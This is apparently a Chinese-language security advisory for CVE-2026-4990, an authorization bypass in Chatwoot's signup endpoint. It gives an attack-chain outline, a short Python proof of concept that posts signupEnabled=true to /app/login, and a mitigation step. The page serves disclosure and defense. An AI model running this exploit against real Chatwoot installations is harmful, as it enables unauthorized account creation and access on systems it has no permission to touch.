CVE-2026-4990 CVSS 7.3 高危

CVE-2026-4990 Chatwoot 授权不当漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4990

漏洞类型

权限绕过

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Chatwoot

漏洞概述

Chatwoot 版本 4.11.1 及之前版本在 /app/login 组件的注册端点存在安全漏洞。攻击者可以通过修改请求参数 signupEnabled 为 true 来绕过授权检查。该漏洞无需用户交互即可远程利用，导致机密性、完整性和可用性受到低程度影响。

技术细节

该漏洞源于 Chatwoot 注册端点中对于 signupEnabled 参数校验的逻辑缺陷。在正常情况下，系统应通过配置文件或后端逻辑严格控制用户注册功能的开启与关闭。然而，受影响版本在处理 /app/login 相关请求时，信任了客户端传入的 signupEnabled 参数。当攻击者发送包含 signupEnabled 为 true 的请求时，后端错误地认为允许注册，从而绕过了原本的授权限制。由于攻击复杂度低且无需权限，攻击者可远程利用此漏洞创建账户或获取未授权访问，进而对系统数据进行低程度的读取、修改或破坏。

攻击链分析

STEP 1

步骤1

攻击者扫描并识别出目标系统为 Chatwoot 且版本受影响（<= 4.11.1）。

STEP 2

步骤2

攻击者向目标 /app/login 端点发送特制的 HTTP POST 请求。

STEP 3

步骤3

请求中包含参数 signupEnabled=true，欺骗服务器开启注册功能。

STEP 4

步骤4

服务器处理请求，绕过正常的授权检查，允许攻击者注册或访问受限资源。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-4990 import requests def exploit(target): url = f"{target}/app/login" # Manipulate the signupEnabled parameter to bypass authorization data = { "signupEnabled": True, "email": "[email protected]", "password": "password123" } try: response = requests.post(url, json=data) if response.status_code == 200: print("[+] Exploit successful! Signup bypassed.") else: print("[-] Exploit failed.") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": exploit("http://target.com")

影响范围

Chatwoot <= 4.11.1

防御指南

临时缓解措施

在应用官方补丁前，建议管理员在反向代理层（如 Nginx）过滤请求体中的 signupEnabled 参数，或暂时关闭系统注册功能以防止漏洞被利用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4990
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4990
3 Details https://www.cvedetails.com/cve/CVE-2026-4990/
4 VulDB https://vuldb.com/cve/CVE-2026-4990
5 Link https://vuldb.com/?ctiid.353877
6 Link https://vuldb.com/?id.353877
7 Link https://vuldb.com/?submit.772515

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表